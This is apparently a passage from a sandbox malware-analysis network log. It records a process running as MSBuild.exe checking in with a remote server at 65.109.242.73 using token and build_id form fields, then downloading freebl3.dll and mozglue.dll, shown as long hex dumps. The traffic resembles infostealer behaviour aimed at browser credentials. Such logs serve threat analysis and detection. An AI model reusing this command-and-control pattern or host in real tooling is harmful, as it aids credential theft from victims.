                                                                                                                                                                                                                                            2024-04-18 08:10:29 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                            Data Ascii: ------KFIEHIIIJDAAAAAAKECBContent-Disposition: form-data; name="token"5e02d61ebd2a6da728e3e6dafb96c43c------KFIEHIIIJDAAAAAAKECBContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------KFIEHIIIJDAAAAAAKECBCont
                                                                                                                                                                                                                                            2024-04-18 08:10:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:30 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            10192.168.2.44974265.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:30 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 437
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:30 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                            Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="token"5e02d61ebd2a6da728e3e6dafb96c43c------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------HJJJDAEGIDHCBFHJJJEGCont
                                                                                                                                                                                                                                            2024-04-18 08:10:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:31 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            11192.168.2.44974365.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:32 UTC157OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:32 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:32 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 685392
                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            ETag: "6315a9f4-a7550"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-04-18 08:10:32 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                                            2024-04-18 08:10:33 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                                                                                                                                                                                            Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                                                                                                                                                                                            2024-04-18 08:10:33 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                                                                                                                                                                                            Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                                                                                                                                                                                            2024-04-18 08:10:33 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                                                                                                                                                                                            Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                                                                                                                                                                                            2024-04-18 08:10:33 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                                                                                                                                                                                            Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                                                                                                                                                                                            2024-04-18 08:10:33 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                                                                                                                                                                                            Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                                                                                                                                                                                            2024-04-18 08:10:33 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                                                                                                                                                                            Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                                                                                                                                                                                            2024-04-18 08:10:33 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                                                                                                                                                                            Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                                                                                                                                                                            2024-04-18 08:10:33 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                                                                                                                                                                            Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                                                                                                                                                                            2024-04-18 08:10:33 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                                                                                                                                                                            Data Ascii: 0<48%8A)$(


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            12192.168.2.44974765.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:34 UTC157OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:35 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:34 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 608080
                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            ETag: "6315a9f4-94750"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-04-18 08:10:35 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                                            2024-04-18 08:10:35 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                                                                                                                                                                                            Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                                                                                                                                                                                            2024-04-18 08:10:35 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                                                                                                                                                                                            Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                                                                                                                                                                                            2024-04-18 08:10:35 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                                                                                                                                                                                            Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                                                                                                                                                                                            2024-04-18 08:10:35 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                                                                                                                                                                                            Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
